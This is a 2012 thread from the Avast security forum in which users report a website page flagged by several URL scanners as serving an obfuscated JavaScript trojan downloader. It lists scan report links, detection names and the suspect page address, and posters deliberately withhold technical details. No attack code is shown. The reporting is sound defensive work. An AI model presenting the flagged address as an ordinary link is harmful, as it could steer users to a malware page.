Avast WEBforum
Other => Viruses and worms => Topic started by: polonus on February 05, 2012, 06:33:13 PM
-
This is the url scan at VT: https://www.virustotal.com/url/acdc0c4b4bfcccf522501ba4685fd93c3ff03c83bbdf033fb071b1903f10e105/analysis/1328461510/
Here the script flagged at unmasked parasites: http://www.UnmaskParasites.com/security-report/?page=zavesata.com/page.php%3F158%3Ascript11%3D
Given clean: http://siteinspector.comodo.com/public/reports/228166
No alerts at urlquery.net: http://urlquery.net/report.php?id=19241
Suspicious at wepawet: http://wepawet.iseclab.org/view.php?hash=a5308ea80bc71e943af34a21c947ae51&t=1328462395&type=js
Trojan downloader not detected by avast? re: http://vscan.urlvoid.com/analysis/4c684bd1136f332144cbfe96101352dc/cGFnZS1waHA=/
DrWeb url scanner detects: -http://zavesata.com/page.php?158:script11=/JSTAG_2[7a29][dce] infected with VBS.Psyme.377
Bitdefender TrafficLight also flags the site as malware site.
reported to virus AT avast dot com,
polonus
-
The PHP page is very nasty indeed, Polonus.
I'll PM you about what I found, it can't be discussed here.
-
Hi Donovansrb10,
No, we won't touch any details of this, but generally a few remarks on this redirecting malcode.
This is a variant on the so-called Media Temple Malware Issue. The method has been with us for quite some time now. Those redirecting domains, encoded inside a JS file, may differ. Also the methods have become more and more refined. See malware description here:
http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=TrojanClicker%3AJS%2FIframe.F&ThreatID=-2147335922
Well the suspicious obfuscated inline script pattern should stand out for detection and avast webshield should detect this really as JS:Downloader-IR[Trj]. About plug-in vulnerability on this site, see: http://e107.org/e107_plugins/forum/forum_viewtopic.php?139119 (link source = e107 Content managment system forum, and post author = CSDave),
polonus